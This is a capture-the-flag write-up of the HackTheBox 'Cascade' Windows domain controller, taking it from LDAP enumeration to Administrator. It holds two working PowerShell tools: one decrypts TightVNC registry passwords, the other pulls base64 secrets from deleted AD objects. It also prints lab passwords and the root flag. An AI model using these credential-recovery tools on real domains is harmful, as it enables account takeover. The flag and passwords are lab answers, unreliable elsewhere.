HackTheBox - Cascade

Summary

Cascade, a Windows box created by HackTheBox user VbScrub, was an overall easy-to-medium difficulty box. Initial enumeration shows that the box is an Active Directory domain controller exposing LDAP. Digging through the directory with JXplorer we get credentials for a user, and in the SMB shares we find a TightVNC registry export containing the encrypted password for s.smith; vncpwd recovers the plaintext. With that we can WinRM in and read user.txt. The shares that become readable with the new account contain an executable and an SQLite database holding an encrypted password for a service account; reverse engineering the binary gives us the password. Logging in with the new credentials, and using a mail we saw in the shares earlier, we recover the password of TempAdmin, which is also the local Administrator password.

Enumeration

# Nmap 7.80 scan initiated Sat Mar 28 15:23:03 2020 as: nmap -v -sC -sV -oN nmap/Cascade 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.16s latency).
Not shown: 986 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-28 19:23:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-28T19:24:10
|_ start_date: 2020-03-28T19:00:42

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 15:26:49 2020 -- 1 IP address (1 host up) scanned in 225.63 seconds

The initial enumeration (DNS, Kerberos, LDAP on 389/636/3268/3269 and SMB, domain cascade.local, host CASC-DC1) shows that this is an Active Directory domain controller, so let's run enum4linux against it; with that we can leak the usernames.

We don't see anything else, so I opened JXplorer and connected to the LDAP server. Looking around, I saw a legacy password attribute for r.thompson with the value rY4n5eva.

User

Using that password over WinRM gets us nothing, so let's look at the SMB shares instead; there we see that we can read the Data share.

Looking inside it, under Temp/s.smith we find a TightVNC registry export (VNC Install.reg) that contains the server's registry keys:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

The interesting value is "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f. TightVNC stores the VNC password as a single DES block encrypted under a fixed, publicly known key, so the registry export alone is enough to recover it. Googling around I found a tool, vncpwd, with which I decrypted the password for s.smith: sT333ve2.
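The same decryption vncpwd performs, written out as an added example in PowerShell (this is not code from the original writeup or from the vncpwd tool; the function name is mine). It takes the Password value exactly as it appears in the .reg export above and uses .NET's DES with the fixed VNC key. It runs in Windows PowerShell or in PowerShell 7 on Linux.

```powershell
# Added example: decrypt a TightVNC "Password" registry value.
# TightVNC (like the other RealVNC-derived servers) encrypts the 8-byte VNC
# password with single-DES under a fixed, well-known key, so anyone who can
# read the registry export can recover the plaintext.

function ConvertFrom-VncPassword {
    param(
        # Hex string exactly as it appears in the .reg export: "6b,cf,2a,..."
        [Parameter(Mandatory)] [string] $RegHex
    )

    # The classic VNC key 23,82,107,6,35,78,88,7 with the bit order of each
    # byte reversed, which is the form a standard DES implementation expects.
    [byte[]] $vncKey = 0xe8, 0x4a, 0xd6, 0x60, 0xc4, 0x72, 0x1a, 0xe0

    [byte[]] $cipher = $RegHex -split ',' | ForEach-Object { [Convert]::ToByte($_.Trim(), 16) }
    if ($cipher.Length -ne 8) {
        throw "Expected exactly 8 ciphertext bytes, got $($cipher.Length)"
    }

    $des = [System.Security.Cryptography.DES]::Create()
    try {
        # One block, no chaining, no padding: ECB with PaddingMode.None
        $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
        $des.Padding = [System.Security.Cryptography.PaddingMode]::None
        $des.Key     = $vncKey
        $decryptor   = $des.CreateDecryptor()
        $plain       = $decryptor.TransformFinalBlock($cipher, 0, $cipher.Length)
    }
    finally {
        $des.Dispose()
    }

    # VNC passwords are at most 8 characters; shorter ones are NUL-padded.
    return [System.Text.Encoding]::ASCII.GetString($plain).TrimEnd([char]0)
}

# Value copied from the registry export found in the Data share
ConvertFrom-VncPassword -RegHex '6b,cf,2a,4b,6e,5a,ca,0f'
```

Running this on the value from the share reproduces the s.smith password that vncpwd gave. The lesson for defenders is that a VNC "password" in the registry, in a .reg backup, or in an installer log is equivalent to the plaintext, so such files should never be left on a share readable by ordinary domain users.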

Using that password we can WinRM in, get a shell, and read user.txt.

Privilege Escalation

Enumerating the box as s.smith, we don't see anything interesting locally, so I took another look at the SMB shares.

Looking inside a share that s.smith can now read, I saw a binary and an SQLite database.

Opening CascAudit.exe in ILSpy, we can reverse the decryption routine and recover the password for arksvc: w3lc0meFr31nd.

Looking at the code, the value stored in the database is decrypted with AES-CBC-128, and the key and IV are recoverable from the decompiled code, so I opened CyberChef to perform the decryption.

Logging in as ArkSvc and enumerating, I don't see anything new. Going back, I recalled a mail in the Data share saying that the TempAdmin user had the same password as the normal admin account. Since that account was to be deleted after the migration, I checked whether arksvc can read deleted AD objects (the AD Recycle Bin), and it can. The mail:


> New production network will be going live on Wednesday so keep an eye out for any issues.

> We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).

> The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.

The deleted TempAdmin object gives us the Administrator password, baCT3r1aN00dles, and we can log in as Administrator.
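An added example of the deleted-object check, not taken from the original writeup (the function name and the base64 heuristic are mine). Run in the WinRM session as arksvc on the domain controller, where the ActiveDirectory module is available, it lists every tombstoned object and decodes any attribute value that looks like base64 and decodes to printable text, which is how a "legacy password" attribute on a deleted account surfaces.

```powershell
# Added example: hunt for base64-encoded secrets on objects in the AD Recycle Bin.
# Requires membership in a group allowed to read deleted objects (here arksvc)
# and the ActiveDirectory module, which is installed on a domain controller.

function Get-DeletedObjectSecrets {
    Import-Module ActiveDirectory

    # Tombstoned objects live under the Deleted Objects container; the container
    # itself is filtered out so only real deleted accounts/objects come back.
    $deleted = Get-ADObject -Filter { isDeleted -eq $true -and name -ne 'Deleted Objects' } `
                            -IncludeDeletedObjects -Properties *

    foreach ($obj in $deleted) {
        foreach ($prop in $obj.PropertyNames) {
            # Multi-valued attributes come back as collections; flatten them.
            foreach ($val in @($obj.$prop)) {
                if ($val -isnot [string]) { continue }

                # Strict base64 shape: multiple of 4 chars, base64 alphabet,
                # padding only at the end. Short values are almost always noise.
                if ($val.Length -lt 8 -or $val.Length % 4 -ne 0 -or
                    $val -notmatch '^[A-Za-z0-9+/]+={0,2}$') { continue }

                try   { $bytes = [Convert]::FromBase64String($val) }
                catch { continue }

                # Keep only decodings that are printable ASCII, i.e. plausible passwords.
                if ($bytes | Where-Object { $_ -lt 0x20 -or $_ -gt 0x7e }) { continue }

                [pscustomobject]@{
                    Object    = $obj.Name
                    Changed   = $obj.whenChanged
                    Attribute = $prop
                    Encoded   = $val
                    Decoded   = [System.Text.Encoding]::ASCII.GetString($bytes)
                }
            }
        }
    }
}

Get-DeletedObjectSecrets | Format-Table -AutoSize
```

In this box the decoded value on the deleted TempAdmin object is the password the mail promised would match the Administrator account. The defensive takeaway is that the AD Recycle Bin is not a safe place for secrets: anyone who can read deleted objects can read every attribute the object carried, so membership in a group with that right should be treated as privileged, and custom attributes holding credentials should never exist in the first place.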

and we can read root.txt: f94e11622c01ceb2445b770f33684c64
and we have pwned Cascade 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/cascade/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.